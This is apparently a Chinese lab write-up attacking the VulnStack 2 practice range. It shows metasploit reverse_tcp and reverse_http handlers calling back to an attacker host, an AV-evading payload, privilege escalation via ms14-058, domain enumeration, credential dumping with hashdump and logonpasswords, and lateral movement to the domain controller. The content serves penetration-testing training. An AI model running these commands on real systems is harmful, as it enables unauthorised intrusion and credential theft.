目录
shell net group "domain users" /domain
shell net group “domain admins” /domain
shell net group “domain computers” /domain
shell net group “domain controllers” /domain
内网渗透靶机-VulnStack 2
主机发现
发现存在192.168.111.128、192.168.111.201两台目标主机,192.168.111.130为kali攻击机
端口扫描
192.168.111.128
192.168.111.201
漏洞利用
445端口存在永恒之蓝漏洞,可能存在杀毒软件所以无法利用
192.168.111.128 7001端口存在反序列化漏洞
上传马
在kali上执行如下命令:
msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.111.130; set lport 4444; run; "
使用掩日2.1生成msf免杀马,使用冰鞋上传并且执行
Msf成功上线
msf上线cs
msf使用注入模块 + cs创建Listener监听 (相同payload)
use exploit/windows/local/payload_inject
set
payload windows/meterpreter/reverse_http
set
DisablePayloadHandler true
set
lhost (cs listener ip)
set
lport (cs listener port)
set
session (id)
Run
CS
成功上线
使用ms14-058提权
内网信息收集
ipconfig /all
存在域de1ay.com
两个网卡,ip分别为192.168.111.128、10.10.10.80
Tasklist
查看进程,存在360杀毒
shell net group "domain users" /domain
查看域用户,存在用户Administrator、de1ay、krbtgt、mssql
shell net group “domain admins” /domain
查看域管理员账号,域管理员账号为Administrator
shell net group “domain computers” /domain
查看域中的机器,除了域控之外还有WEB和PC两台机器
shell net group “domain controllers” /domain
查看域控制器
shell net time /domain
查询域控主机名
shell nslookup DC.de1ay.com
查询域控对应的ip
内网另外一台机器的ip为
抓取WEB主机的密码
hashdump
logonpasswords
内网横向
尝试使用cs横向
首先建立一个smb监听
利用上面爬取到的密码进行横向
成功拿到域控的权限
按照上面的方法,同样拿下PC机器
成果如图所示: